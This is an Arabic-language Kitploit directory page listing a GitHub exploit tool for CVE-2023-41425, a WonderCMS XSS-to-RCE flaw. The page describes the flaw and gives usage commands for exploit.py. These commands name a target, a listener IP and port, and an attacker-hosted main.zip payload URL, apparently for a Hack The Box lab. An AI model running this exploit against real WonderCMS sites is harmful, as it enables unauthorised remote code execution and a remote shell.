Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-41425 — WonderCMS RCE CVE-2023-41425 | Kitploit
أدوات/GitHubGitHub/twappz/cve-2023-41425
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubtwappz/cve-2023-41425

CVE-2023-41425

WonderCMS RCE CVE-2023-41425

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RCE لـ WonderCMS الإصدارات من v3.2.0 إلى v3.4.2

إصدارات WonderCMS من v3.2.0 إلى v3.4.2 التي تحتوي على ثغرة XSS تتيح لمهاجم خبيث تحقيق RCE عن طريق رفع مكوّن إلى installModule CVE-2023-41425 (لا حاجة لمعرفة كلمة المرور).

الميزات:

  • استغلال آلي لثغرة CVE-2023-41425
  • سهولة تحديد المضيف البعيد الذي يتم تنزيل ملف zip منه

الاستخدام/أمثلة

تحديد المضيف البعيد الذي يتم تنزيل ملف main.zip منه

root@kitploit:~
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip

أو عدم تحديد ملف main.zip. افتراضيًا، يتم التنزيل من main.zip

root@kitploit:~
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321

لقطات الشاشة

الاستخدام الاستخدام

🔗 الروابط

my website youtube twitter instagram Hack the box

تنزيل الأداة